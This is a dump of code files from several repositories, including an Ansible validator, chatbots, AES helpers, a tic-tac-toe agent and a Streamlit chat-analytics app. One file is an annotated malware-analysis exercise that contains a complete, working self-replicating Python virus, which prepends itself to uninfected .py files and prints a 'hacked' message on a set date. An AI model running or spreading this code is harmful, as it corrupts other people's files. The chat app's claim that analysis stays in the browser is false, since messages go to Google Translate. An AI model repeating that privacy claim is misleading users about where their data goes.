seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
42775151544 | from .models import (
ActionList,
Action,
ExpectList,
Expect,
ExportDict,
SkipIfList,
SkipIf,
)
from .validators import validate_boolean, validate_conditionals,validate_export_dict
class ArgType:
type = lambda value: value # noqa
value = None
class UsingArgType(ArgType):
type = str
def __call__(self, value) -> str:
"""
1. Check if value is a string
2. Check if value is a namespace.collection
3. Check if namespace.collection is installed
"""
if not isinstance(value, str):
raise ValueError(
f"`using` must be a string, got {type(value).__name__}"
)
if len(value.split(".")) != 2:
raise ValueError(
f"`using` must be a <namespace>.<collection>, got {value}"
)
# TODO: Check if collection is installed
self.value = self.type(value)
return value
class ActionsArgType(ArgType):
type = ActionList
def __call__(self, actions) -> list:
"""
1. Check if actions is a list
2. For each action in actions
2.1 Check if action is a dict or a str
2.2 Create the action instance
2.3 Add Action to return value
"""
value = []
if not isinstance(actions, list):
msg = f"`actions` must be a list, got {type(actions).__name__}"
if isinstance(actions, dict):
msg += (
f" did you mean `- {list(actions.keys())[0]}:` ?"
)
if isinstance(actions, str):
msg += f" did you mean `[{actions}]` or `- {actions}` ?"
raise ValueError(msg)
_valid = ", ".join(Action.Config.valid_ansible_arguments)
for action in actions:
if isinstance(action, dict):
# ensure this is a single key-value pair
if len(action) != 1:
raise ValueError(
f"`action` must be single key dictionary,"
f" got {action.keys()}"
)
action_key = list(action.keys())[0]
if "." not in action_key:
raise ValueError(
f"`action` must be <module>.<action>, got {action_key}"
)
module_name, action_name = action_key.split(".")
action_value = action[action_key]
if not isinstance(action_value, dict):
raise ValueError(
f"`{action_key}:` takes"
" {param: value, ...},"
f" where `param` is one of {_valid}"
f", but got {action_value}"
)
try:
action = Action(
module_name=module_name,
action_name=action_name,
**action_value,
)
except TypeError as e:
_invalid = set(action_value) - set(
Action.Config.valid_ansible_arguments
)
raise ValueError(
f"Unsupported parameters"
f" for `{action_key}: {_invalid}`"
f". Supported parameters include: {_valid}"
) from e
elif isinstance(action, str):
if "." not in action:
raise ValueError(
f"`action` must be <module>.<action>, got {action}"
)
module, action_name = action.split(".")
action = Action(module_name=module, action_name=action_name)
else:
raise ValueError(
f"`actions` must be a list of dicts"
f" or strings, got {type(action).__name__}"
)
value.append(action)
self.value = self.type(value)
return actions
class SkipifArgType(ArgType):
type = SkipIfList
def __call__(self, value) -> str:
self.value = validate_conditionals(value, "skipif", SkipIf, self.type)
return value
class ExpectArgType(ArgType):
type = ExpectList
def __call__(self, value) -> list:
self.value = validate_conditionals(value, "expect", Expect, self.type)
return value
class ExportArgType(ArgType):
type = ExportDict
def __call__(self, value) -> dict:
self.value = self.type(validate_export_dict(value))
return value
class RequiredArgType(ArgType):
def __call__(self, value) -> bool:
self.value = validate_boolean(value)
return value
| rochacbruno/ansible-test | ansible-test/plugins/module_utils/arg_types.py | arg_types.py | py | 4,795 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "models.ActionList",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "models.Action.Config",
"line_number": 63,
"usage_type": "attribute"
},
{
"api_name": "models.Action",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "models.Acti... |
32422202346 | import wolframalpha
import pprint
import json
class WolframAlpha:
def __init__(self, appId):
self.__client = wolframalpha.Client(appId)
self.__prettyPrinter = pprint.PrettyPrinter()
self.__pp = self.__prettyPrinter.pprint
def question(self, query):
if len(query.strip()) == 0:
return "Ask me a question."
try:
response = self.__client.query(query.strip())
except Exception:
return "Help! Tell SirDavidLudwig or Raine to fix me!"
if response['@success'] == 'true':
# Print the response to the terminal for debugging purposes
try:
json.dumps(response, indent=4)
except Exception as e:
print(response)
# Search for primary pod
for pod in response['pod']:
if "@primary" in pod and pod["@primary"] == "true":
if type(pod['subpod']) == list:
return pod['subpod'][0]['plaintext']
else:
return pod['subpod']['plaintext']
print("No primary found")
return response['pod'][0]['subpod']['plaintext']
elif '@timedout' in response:
return "I cannot tell unfortunately."
return "I'm sorry, I don't understand what you are asking me here."
| IntercraftMC/InterCraftBot_Deprecated | src/modules/wolframalpha.py | wolframalpha.py | py | 1,122 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "wolframalpha.Client",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pprint.PrettyPrinter",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 26,
"usage_type": "call"
}
] |
42366591652 | from email.mime import base
from AES_encipher import CTR_Mode
from OAEP import *
from RSA_key_gen import AES_key_gen
from utility import bit_size
import base64
from math import ceil
class data_msg:
""" Class that holds the values used in the data transfer. """
def __init__(self, signature: bytes = None, msg: bytes = None, symmetric_key: bytes = None, nonce_val: int = None):
self.signature = signature
self.msg = msg
self.symmetric_key = symmetric_key
self.nonce_val = nonce_val # Used in the AES_CTR mode
def from_base64(self, base64_str: str):
dm = data_msg()
d = vars(dm)
lines = base64_str.split('\n')
idx = 0
for k in d.keys():
d[k] = lines[idx]
d[k] = base64.b64decode(d[k])
idx += 1
self.__dict__ = d
self.nonce_val = int.from_bytes(self.nonce_val, byteorder='big')
def int_to_byte(self, val):
if type(val) != type(bytes()):
l = ceil(bit_size(val) / 8)
val = val.to_bytes(length=l, byteorder='big')
return val
def get_base64_encode(self):
self.nonce_val = self.int_to_byte(self.nonce_val)
my_vars = vars(self)
result = str()
for v in my_vars.values():
if v == None:
result += base64.b64encode(bytes()).decode('utf-8') + '\n'
else:
result += base64.b64encode(v).decode('utf-8') + '\n'
self.nonce_val = int.from_bytes(self.nonce_val, byteorder='big')
return result
class AES_message_cipher:
""" Does the ciphering of a message, in bytes, of any size. """
def __init__(self, key_bit_size = 128):
self.__block_count__ = 16 # the block bytes count
kg = AES_key_gen(key_bit_size)
self.key = kg.generate_key()
self.key = self.key.to_bytes(length=kg.bit_size // 8, byteorder='big')
def encrypt(self, msg: bytes):
blocks_count = ceil(len(msg) / self.__block_count__)
dm = data_msg()
cipher_blocks = []
cipher = CTR_Mode(self.key)
for i in range(blocks_count):
idx = i * self.__block_count__
if i == blocks_count - 1:
b = msg[idx:]
else:
b = msg[idx:idx + self.__block_count__]
b = cipher.encrypt_block(data=b)
cipher_blocks += (b)
cipher_blocks = bytes(cipher_blocks)
dm.msg = cipher_blocks
dm.symmetric_key = self.key
dm.nonce_val = cipher.nonce
return dm
class AES_message_decipher:
""" Deciphers a message, in bytes, of any size. """
def __init__(self):
self.__block_count__ = 16 # the block bytes count
def decrypt(self, dm: data_msg):
blocks_count = ceil(len(dm.msg) / self.__block_count__)
cipher = CTR_Mode(dm.symmetric_key, nonce=dm.nonce_val)
msg = []
for i in range(blocks_count):
idx = i * self.__block_count__
if i == blocks_count - 1:
b = dm.msg[idx:]
else:
b = dm.msg[idx:idx + self.__block_count__]
b = cipher.decrypt_block(b)
msg += b
msg = bytes(msg)
return msg | Cezari0o/Gerador-Assinaturas-RSA | data_msg.py | data_msg.py | py | 3,301 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "base64.b64decode",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "math.ceil",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "utility.bit_size",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "base64.b64encode",
"l... |
75220903145 | import argparse
from . import test_data
from .. import music
from .. import key_recognition
def parse_args():
parser = argparse.ArgumentParser(
description='Test getting key from sounds')
parser.add_argument('--verbose_factor_threshold', '-Vft',
required=False,
help='Color red and print full mismatches list for tests with match factor lesser than VERBOSE_FACTOR_THRESHOLD', # noqa
type=float)
parser.add_argument('--verbose_duration_threshold', '-Vdt',
required=False,
help='Print only mismatches with duration greater than VERBOSE_DURATION_THRESHOLD', # noqa
type=float)
args = parser.parse_args()
return args
class Mismatch(music.Key):
def __init__(self, note_computed, note_model, kind_computed, kind_model,
timestamp, duration_ms):
super().__init__(note_computed, timestamp, duration_ms, kind_computed)
self.note_model = note_model
self.kind_model = kind_model
@property
def key_model(self):
if self.note_model is None:
symbol = 'None'
else:
symbols = ['C', 'C#', 'D', 'D#', 'E',
'F', 'F#', 'G', 'G#', 'A', 'A#', 'H']
symbol = symbols[self.note_model]
return f"{symbol}-{self.kind_model}"
def __str__(self):
return f"{round(self.timestamp, 3)} - {round(self.end_timestamp, 3)}: Expected {self.key_model}, got {super().__str__()}" # noqa
def run_tests():
verbose_factor_threshold = parse_args().verbose_factor_threshold
verbose_duration_threshold = parse_args().verbose_duration_threshold
if verbose_factor_threshold is None:
verbose_factor_threshold = 0.5
if verbose_duration_threshold is None:
verbose_duration_threshold = 0.1
tests = test_data.get_all_test_models()
print("-----------TONATIONS TEST-----------------")
for test in tests:
key = key_recognition.get_key(test.sounds)
match = key == test.key
if match:
color = '\033[92m'
print(f"{test.file_path}: {color} {key} matches {test.key} \033[0m") # noqa
else:
color = '\033[91m'
print(f"{test.file_path}: {color}{key} doesn't match {test.key} \033[0m") # noqa
| JakubBilski/tonations-recognition | src/tests/key_from_sounds_test.py | key_from_sounds_test.py | py | 2,381 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 9,
"usage_type": "call"
}
] |
23403442036 | import random
import pygame
from pygame.locals import *
import logging
import numpy as np
import itertools
# logging.basicConfig(filename = 'Result.log', level=logging.INFO)
# copy Rohit Agrawal's work and modify for py_game version. It doesn't work really well but the concept has been applied.
pygame.init()
BLUE = (0, 0, 255)
GREEN = (0 ,255, 0)
RED = (255, 0 , 0)
width = 300
height = 300
line_width = 6
font = pygame.font.SysFont(None,20)
screen = pygame.display.set_mode((width, height))
markers = [[0,0,0],[0,0,0],[0,0,0]]
clicked = False
pos = []
player = 1
winner = 0
game_over = False
again_rect = Rect(width//2 - 80,height//2,160,50)
win = [0,0]
totalgame = 0
win_text = ''
winrateCalculated = False
states_dict = {}
def copy_game_state(state):
new_state = [[0,0,0],[0,0,0],[0,0,0]]
for i in range(3):
for j in range(3):
new_state[i][j] = state[i][j]
return new_state
def play_move(state, player, block_num):
if state[int((block_num-1)/3)][(block_num-1)%3] == 0:
state[int((block_num-1)/3)][(block_num-1)%3] = player
def draw_grid():
gr = (50,50,50)
bg = (255,255,200)
screen.fill(bg)
for x in range(1,3):
pygame.draw.line(screen,gr,(0,x*(width/3)), (width,x * (width/3)), line_width)
pygame.draw.line(screen,gr,(x*(height/3),0), (x * (height/3),height), line_width)
def draw_marker():
x_pos = 0
for x in markers:
y_pos =0
for y in x:
if y == 1:
pygame.draw.line(screen,GREEN,(y_pos*100+15,x_pos*100+15),(y_pos*100+85,x_pos*100+85))
pygame.draw.line(screen,GREEN,(y_pos*100+15,x_pos*100+85),(y_pos*100+85,x_pos*100+15))
if y == -1:
pygame.draw.circle(screen,RED,(y_pos*100+50,x_pos*100+50),30,line_width)
y_pos +=1
x_pos +=1
def check_winner():
global winner
global game_over
y_pos = 0
for x in markers:
if sum(x) == 3:
winner = 1
game_over =True
if sum(x) == -3:
winner = 2
game_over =True
if markers[0][y_pos] + markers[1][y_pos] + markers[2][y_pos] == 3:
winner = 1
game_over = True
if markers[0][y_pos] + markers[1][y_pos] + markers[2][y_pos] == -3:
winner = 2
game_over= True
y_pos +=1
if markers[0][0] + markers[1][1] +markers[2][2] == 3 or markers[2][0] + markers[1][1] +markers[0][2] == 3:
winner = 1
game_over = True
if markers[0][0] + markers[1][1] +markers[2][2] == -3 or markers[2][0] + markers[1][1] +markers[0][2] == -3:
winner = 2
game_over = True
def draw_winner(winner):
global totalgame, win_text, winrateCalculated
if winner == 0 and winrateCalculated == False:
totalgame += 1
win_text = 'Draw!'
else:
if winner == 1 and winrateCalculated == False:
totalgame += 1
win[0] += 1
winrate1 = str((win[0]/totalgame)*100)
win_text = 'Player 1 wins!'
logging.info(win_text)
if winner == 2 and winrateCalculated == False:
totalgame += 1
win[1] += 1
winrate2 = str((win[1]/totalgame)*100)
win_text = 'Player 2 wins!'
logging.info(win_text)
win_img = font.render(win_text, True, BLUE)
pygame.draw.rect(screen,GREEN,(width//2 -100,height//2 -60,200,50))
screen.blit(win_img,(width//2 -100,height//2 -50))
again_text = 'Play Again?'
again_img = font.render(again_text, True, BLUE)
pygame.draw.rect(screen,GREEN,again_rect)
screen.blit(again_img,(width//2 -80,height//2 +10))
winrateCalculated = True
def getBestMove(state, player):
'''
Reinforcement Learning Algorithm
'''
moves = []
curr_state_values = []
empty_cells = []
#find all empty cells
for i in range(3):
for j in range(3):
if state[i][j] == 0:
empty_cells.append(i*3 + (j+1))
if not empty_cells:
return -1
for empty_cell in empty_cells:
moves.append(empty_cell)
new_state = copy_game_state(state)
play_move(new_state, player, empty_cell)
next_state_idx = list(states_dict.keys())[list(states_dict.values()).index(new_state)]
curr_state_values.append(state_values_for_AI[next_state_idx])
print('next state value', state_values_for_AI[next_state_idx])
print('Possible moves = ' + str(moves))
print('Move values = ' + str(curr_state_values))
print('markers:',markers)
best_move_idx = np.argmax(curr_state_values)
# print('state:',states_dict[best_move_idx])
best_move = moves[best_move_idx]
return best_move
def print_board(game_state):
print('----------------')
print('| ' + str(game_state[0][0]) + ' || ' + str(game_state[0][1]) + ' || ' + str(game_state[0][2]) + ' |')
print('----------------')
print('| ' + str(game_state[1][0]) + ' || ' + str(game_state[1][1]) + ' || ' + str(game_state[1][2]) + ' |')
print('----------------')
print('| ' + str(game_state[2][0]) + ' || ' + str(game_state[2][1]) + ' || ' + str(game_state[2][2]) + ' |')
print('----------------')
#LOAD TRAINED STATE VALUES
state_values_for_AI = np.loadtxt('trained_state_values_O.txt', dtype=np.float64)
players = [1,-1,0]
states_dict = {}
all_possible_states = [[list(i[0:3]),list(i[3:6]),list(i[6:10])] for i in itertools.product(players, repeat = 9)]
n_states = len(all_possible_states) # 2 players, 9 space values
n_actions = 9 # 9 spaces
for i in range(n_states):
states_dict[i] = all_possible_states[i]
run = True
while run:
draw_grid()
draw_marker()
draw = 0
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
if game_over == 0:
if event.type == pygame.MOUSEBUTTONDOWN:
clicked = True
if event.type == pygame.MOUSEBUTTONUP and clicked == True:
clicked = False
pos = pygame.mouse.get_pos()
cell_x = pos[1]
cell_y = pos[0 ]
print(cell_x//100,cell_y//100)
if markers[cell_x//100][cell_y//100] == 0:
markers[cell_x//100][cell_y//100] = player
player *= -1
check_winner()
if player == -1 and game_over == False:
smartMove = getBestMove(markers,-1)
print(smartMove)
if smartMove == -1:
#draw
player = 0
game_over = True
else:
markers[(smartMove-1)%3][int((smartMove-1)/3)] = player
print_board(markers)
player *= -1
check_winner()
if game_over == True:
draw_winner(winner)
if event.type == pygame.MOUSEBUTTONDOWN:
clicked = True
if event.type == pygame.MOUSEBUTTONUP and clicked == True:
pos = pygame.mouse.get_pos()
if again_rect.collidepoint(pos):
markers = []
pos = []
player = 1
winner = 0
game_over = False
for x in range(3):
row = [0]*3
markers.append(row)
pygame.display.update()
pygame.quit() | nguyenkhanhhung91/Python_ReinforcementLearning | HumanVsQlearningBot.py | HumanVsQlearningBot.py | py | 6,564 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pygame.init",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pygame.font.SysFont",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "pygame.font",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "pygame.display.set_m... |
73065938023 | # Script: 14 - Python Malware Analysis
# Author: Robert Gregor
# Date of latest revision: 302030FMAR23
# Objectives
# Perform an analysis of the Python-based code given below
# Insert comments into each line of the script explaining in your own words what the virus is doing on this line
# Insert comments above each function explaining what the purpose of this function is and what it hopes to carry out
# Insert comments above the final three lines explaining how the functions are called and what this script appears to do
# My Sources:
# [Python | os.listdir() method](https://www.geeksforgeeks.org/python-os-listdir-method/)
# [Python For Loops](https://www.w3schools.com/python/python_for_loops.asp)
# [Python | os.path.isdir() method](https://www.geeksforgeeks.org/python-os-path-isdir-method/)
# [Python List extend()](https://www.programiz.com/python-programming/methods/list/extend)
# [Python break statement](https://www.tutorialspoint.com/python/python_break_statement.htm)
# [Python: os.path.abspath() method with example](https://www.geeksforgeeks.org/python-os-path-abspath-method-with-example/)
# [Python File close() Method](https://www.tutorialspoint.com/python/file_close.htm)
# [Python File Write](https://www.w3schools.com/python/python_file_write.asp)
# Main
#!/usr/bin/python3
# Imports os and datetime modules
import os
import datetime
# Sets the SIGNATURE variable equal to the string VIRUS
SIGNATURE = "VIRUS"
# Function takes path variable as parameter and searches for files to target
def locate(path):
# Declares empty list
files_targeted = []
# Sets filelist equal to list of all files and directories in path variable
filelist = os.listdir(path)
# for loop used to apply coonditionals below to each item in filelist
for fname in filelist:
# Conditional checks if path is an existing directory or not
if os.path.isdir(path+"/"+fname):
# If true, execute the locate function to append additional files to end of list
files_targeted.extend(locate(path+"/"+fname))
# Conditional checks if any of the files are python files
elif fname[-3:] == ".py":
# If true, set the infected variable equal to False
infected = False
# for loop used to open each file in the given path
for line in open(path+"/"+fname):
# Conditional checks if SIGNATURE string "VIRUS" is in any line in file
if SIGNATURE in line:
# If true, sets infected variable to True and exits current for loop
infected = True
break
# Conditional check if infected is False
if infected == False:
# If true, add file to given directory for targetting
files_targeted.append(path+"/"+fname)
# return all files that are not yet infected
return files_targeted
# Function used to infect all files identified by locate function
def infect(files_targeted):
# Set virus variable equal to pathname to path passed as parameter
virus = open(os.path.abspath(__file__))
# Sets virusstring variable to an empty string
virusstring = ""
# for loop used to enumerate through each line in virus variable
for i,line in enumerate(virus):
# Conditional checks if line is greater then or equl to zero AND less then 39
if 0 <= i < 39:
# If true, add line to virusstring
virusstring += line
# Closed virus file
virus.close
# for loop used to executes commands on each item in files_targeted
for fname in files_targeted:
# Opens file
f = open(fname)
# Set temp variable equal to contents of file opened
temp = f.read()
# Closes file
f.close()
# Open file to write to
f = open(fname,"w")
# Write over previous file with current file
f.write(virusstring + temp)
# Closes file
f.close()
# Function used to print "You have been hacked" at a specified time
def detonate():
# Conditional checks if current month is equal to 5 and current date is equal to 9
if datetime.datetime.now().month == 5 and datetime.datetime.now().day == 9:
# If true, prints statement
print("You have been hacked")
# Declares file_targeted variable equal to current directory files
files_targeted = locate(os.path.abspath(""))
# Runs infect function on files_targeted
infect(files_targeted)
# Runs detonate function
detonate()
# End | RobG-11/Ops301-Code-Challenges | 14_malware_analysis.py | 14_malware_analysis.py | py | 4,617 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "os.path.isdir",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_num... |
30332494769 | import streamlit as st
import pandas as pd
import numpy as np
import re
import emoji
import io
from collections import Counter
import datetime
import plotly.express as px
from numpy import random
from multiprocessing.dummy import Pool as ThreadPool
from wordcloud import WordCloud, STOPWORDS
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
import matplotlib.pyplot as plt
from deep_translator import GoogleTranslator
from helper import *
st.set_page_config(
page_title="Chat Analytics Dashboard",
page_icon="🔍",
layout="wide")
#Styling the Structure
#https://share.streamlit.io/rawrapter/chat-analytics-dashboard/main/chat_analyze.py
hide_streamlit_style = """
<style>
#MainMenu {visibility: hidden;}
footer {visibility: hidden;}
</style>
"""
st.markdown(hide_streamlit_style, unsafe_allow_html=True)
st.title("Chat Analytics Dashboard")
st.markdown('<small>Made with ♥ in India. © <b>Anant Arun</b></small>',unsafe_allow_html=True)
# translator = GoogleTranslator(source='auto', target='en')
#Calling Vader to extract out all sentiment analysis
sid_obj = SentimentIntensityAnalyzer()
pool = ThreadPool(8)
stopwords = set(STOPWORDS)
with st.expander("How to export your Conversation"):
st.write("""To export a copy of the history of an individual chat or group:
\n1. Open the conversation or group.
\n2. For Android: Click on three vertical dots on top right corner and select More. \nFor iOS: Tap on Contact/Group Name.
\n3. Select Export chat.
\n4. Choose Without Media.
\n5. You will asked how to save your chat history attached as a .txt document. \nSave it wherever you like. Then download the .txt file and upload it below.""")
#File uploader from streamlit to upload file
chat_file = st.file_uploader("Upload chat file (Don't worry your data is safe. Analysis is done in your browser only.)", type=["txt"])
chat_content = []
if chat_file != None:
raw_text = io.TextIOWrapper(chat_file,encoding='utf-8')
chat_content = raw_text.readlines()
def translate_request(text):
translate_text = GoogleTranslator(target='en').translate(text.strip().lower())
if translate_text != None:
translate_text = " ".join(word for word in translate_text.split(" ") if word not in stopwords)
return translate_text
def list_to_DF(list,format=0):
date_format=['%d/%m/%Y, %I:%M %p','%d/%m/%y, %I:%M %p','%m/%d/%y, %I:%M %p']
date=re.compile('\d{1,2}/\d{1,2}/\d{2,4}')
df=pd.DataFrame(columns=['date_time','author','message'])
for chat in list:
if date.match(chat):
dat_time,conversation=re.split(' - ',chat,maxsplit=1)
try:
aut,msg=re.split(':',conversation,maxsplit=1)
except ValueError:
aut=np.nan
msg=str.strip(conversation)
d=str.strip(dat_time)
try:
dt=datetime.datetime.strptime(str.strip(dat_time),date_format[format])
except ValueError:
return list_to_DF(list,format+1)
df=df.append({'date_time':dt,'author':aut,'message':str.strip(msg)},ignore_index=True)
else:
df.iloc[-1].message=df.iloc[-1].message+' '+chat
return df
def data_preperation(df):
year = lambda x:x.year
emoji_extract = lambda x:''.join(re.findall(emoji.get_emoji_regexp(),x))
url_pattern = r'(https?://\S+)'
df.dropna(inplace=True)
df['date'] = df['date_time'].apply(pd.Timestamp.date)
df['day'] = df['date_time'].apply(pd.Timestamp.day_name)
df['month'] = df['date_time'].apply(pd.Timestamp.month_name)
df['year'] = df['date_time'].apply(year)
df['time'] = df['date_time'].apply(pd.Timestamp.time).apply(lambda x: datetime.datetime.strptime(str(x), "%H:%M:%S")).apply(lambda x: x.strftime("%I:%M %p"))
df['emoji_used'] = df.message.apply(emoji_extract)
df['Media'] = df.message.str.contains('<Media omitted>')
df['urlcount'] = df.message.apply(lambda x: re.findall(url_pattern, x)).str.len()
return df
if chat_content!=[]:
df=list_to_DF(chat_content)
df=data_preperation(df)
st.subheader("Conversation Stats")
st.write("\n")
st.write("Total Text Messages: ", df.shape[0])
st.write("Total Media Messages: ", df[df['Media']].shape[0])
st.write("Total Emojis: ", sum(df['emoji_used'].str.len()))
st.write("Total Links/URLs: ", np.sum(df.urlcount))
media_messages_df = df[df['message'] == '<Media omitted>']
messages_df = df.drop(media_messages_df.index)
author_value_counts = df['author'].value_counts().to_frame()
fig0 = px.bar(author_value_counts, y='author', x=author_value_counts.index,color='author',color_continuous_scale='Tealgrn' ,labels={'index':'Employees','author':'Overall Participation'}, title="Employees Team Interaction")
st.plotly_chart(fig0)
sort_type = st.selectbox("Sort By:",["Date","Day","Time","Month"])
if sort_type=="Date":
keyword="date"
elif sort_type=="Day":
keyword="day"
elif sort_type=="Time":
keyword = "time"
elif sort_type=="Month":
keyword = "month"
sort_df = messages_df.groupby(keyword).sum()
sort_df['MessageCount'] = messages_df.groupby(keyword).size().values
sort_df.reset_index(inplace=True)
fig = px.line(sort_df, x=keyword, y="MessageCount", title=f"Overall Number of Messages according to {keyword}",)
fig.update_xaxes(nticks=20,showgrid=False)
st.plotly_chart(fig)
author_df = df["author"].value_counts().reset_index()
author_df.rename(columns={"index":"author", "author":"Number of messages"}, inplace=True)
author_df["Total %"] = round(author_df["Number of messages"]*100/df.shape[0], 2)
author_df["Involvement"] = author_df["Total %"].apply(lambda x: talkativeness(x, df["author"].nunique()))
t_author_df = df.copy()
t_author_df["year"] = t_author_df["date"].apply(lambda x: x.year)
t_author_df["month"] = t_author_df["date"].apply(lambda x: x.strftime("%b"))
months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
t_author_df['month'] = pd.Categorical(t_author_df['month'], months)
analysis_1_df = t_author_df.pivot_table(index=["month", "year"], columns=["author"], values=["message"], aggfunc="count", fill_value=0)
analysis_1_df.columns = [col_[1] for col_ in analysis_1_df.columns]
analysis_1_df = analysis_1_df.reset_index().sort_values(["year", "month"])
analysis_1_df["month_year"] = analysis_1_df.apply(lambda x: x["month"] + " " + str(x["year"]), axis=1)
analysis_1_df.drop(["month", "year"], axis=1, inplace=True)
analysis_1_df.set_index('month_year',inplace=True)
author_df["Trend"] = author_df["author"].apply(lambda x: trendline(analysis_1_df[x]))
st.write('Overall Team Involvement Trend',author_df)
#emoji distribution
senders = st.selectbox("Select participant:",messages_df.author.unique())
dummy_df = messages_df[messages_df['author'] == senders]
#Individual Line chart
dummy_df1 = dummy_df.groupby(keyword).sum()
dummy_df1['MessageCount'] = dummy_df.groupby(keyword).size().values
dummy_df1.reset_index(inplace=True)
fig2 = px.line(sort_df, x=keyword, y="MessageCount", title=f"Overall Involvement of {senders} in {keyword} wise",)
fig2.update_xaxes(nticks=20,showgrid=False)
st.plotly_chart(fig2)
total_emojis_list = list([a for b in dummy_df.emoji_used for a in b])
emoji_dict = dict(Counter(total_emojis_list))
emoji_dict = sorted(emoji_dict.items(), key=lambda x: x[1], reverse=True)
author_emoji_df = pd.DataFrame(emoji_dict, columns=['emoji', 'count'])
fig5 = px.pie(author_emoji_df, values='count', names='emoji', title=f'Emoji Distribution for {senders}')
fig5.update_traces(textposition='inside', textinfo='percent+label',showlegend=False)
st.plotly_chart(fig5)
comment_words = ''
for val in dummy_df.message:
# typecaste each val to string
val = str(val)
# split the value
tokens = val.split()
# Converts each token into lowercase
for i in range(len(tokens)):
tokens[i] = tokens[i].lower()
comment_words += " ".join(tokens)+" "
wordcloud = WordCloud(width = 800, height = 800,
background_color ='black',
stopwords = stopwords,min_font_size=6).generate(comment_words)
# plot the WordCloud image
with st.expander("Tap to View Wordcloud"):
fig, ax = plt.subplots(figsize = (10, 10),facecolor = 'k')
ax.imshow(wordcloud,interpolation='bilinear')
ax.axis("off")
plt.tight_layout(pad=0)
st.pyplot(fig)
senti = []
with st.spinner(f'Analyzing Sentiment for {senders}.. (This may take some time depending on size of data)'):
try:
translation = pool.map(translate_request, dummy_df["message"].values)
except Exception as e:
raise e
pool.close()
pool.join()
for i in translation:
if i!=None:
sentiment_dict = sid_obj.polarity_scores(i)
if sentiment_dict['compound'] >= 0.05 :
senti.append("Positive")
elif sentiment_dict['compound'] <= - 0.05 :
senti.append("Negative")
else :
senti.append("Neutral")
all_sents = Counter(senti)
fig6 = px.bar(y=all_sents.values(), x=all_sents.keys(),color=all_sents.keys(),color_discrete_sequence=['green','blue','red'] ,labels={'x':'Sentiment','y':'Interaction'},title=f"Sentiments for {senders}")
fig6.update_layout(showlegend=False)
st.plotly_chart(fig6)
result = max(all_sents,key=all_sents.get)
st.info(f"{senders} mostly conveys {result} behaviour")
st.write("\n")
"""
# This code was made for testing purpose only
if st.checkbox(f"Click to check score for the {senders} (Out of 100)"):
score_df = messages_df[messages_df['author'] == senders]
score_df['MessageCount'] = score_df.shape[0]
if score_df[(score_df['MessageCount'] > 400)].shape[0] > 0:
st.write(f"Score for {senders}: ",random.randint(80,100))
elif score_df[(score_df['MessageCount'] > 300) & (score_df['MessageCount'] < 400)].shape[0] > 0:
st.write(f"Score for {senders}: ",random.randint(70,80))
elif score_df[(score_df['MessageCount'] > 200) & (score_df['MessageCount'] < 300)].shape[0] > 0:
st.write(f"Score for {senders}: ",random.randint(60,70))
elif score_df[(score_df['MessageCount'] > 100) & (score_df['MessageCount'] < 200)].shape[0] > 0:
st.write(f"Score for {senders}: ",random.randint(50,60))
else:
st.write(f"Score for {senders}: ",random.randint(40,50))
"""
st.markdown(' <br><br><center>Developed and Maintained by <b><a href="https://www.linkedin.com/in/anantarun" target="_blank">Anant Arun</a></b></center>',unsafe_allow_html=True)
| RawRapter/Chat-Analytics-Dashboard | chat_analyze.py | chat_analyze.py | py | 11,100 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "streamlit.set_page_config",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "streamlit.markdown",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "streamlit.title",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "streamli... |
37760975497 | from rest_framework import renderers
from teslacoil.encoders import TeslaEncoder
class TeslaRenderer(renderers.JSONRenderer):
encoder_class = TeslaEncoder
def render(self, data, accepted_media_type=None, renderer_context=None):
model = renderer_context['view'].model
model_admin = renderer_context['view'].model_admin
request = renderer_context['request']
response_wrapper = {
'meta': model_admin,
'objects': data,
}
return super(TeslaRenderer, self).render(
response_wrapper, accepted_media_type, renderer_context)
| celerityweb/django-teslacoil | teslacoil/renderers.py | renderers.py | py | 614 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "rest_framework.renderers.JSONRenderer",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.renderers",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "teslacoil.encoders.TeslaEncoder",
"line_number": 7,
"usage_type": "name... |
39056132329 | from numpy import genfromtxt,linspace, meshgrid,c_,where
from mudpy.view import plot_grd
from matplotlib import pyplot as plt
from scipy.interpolate import griddata
fault=genfromtxt('/Users/dmelgar/Slip_inv/Melinka_usgs/output/inverse_models/models/gsi_vr2.6.0011.inv.total')
grdfile='/Users/dmelgar/code/GMT/Melinka/lock.grd'
Xlock,Ylock,lock=plot_grd(grdfile,[0,1],plt.cm.magma,flip_lon=False,return_data=True)
#Interpolate
x=linspace(-75,-73,100)
y=linspace(-44,-42,100)
X,Y=meshgrid(x,y)
z = griddata(fault[:,1:3], (fault[:,8]**2+fault[:,9]**2)**0.5, (X, Y), method='linear',fill_value=0)
#get 1m contour
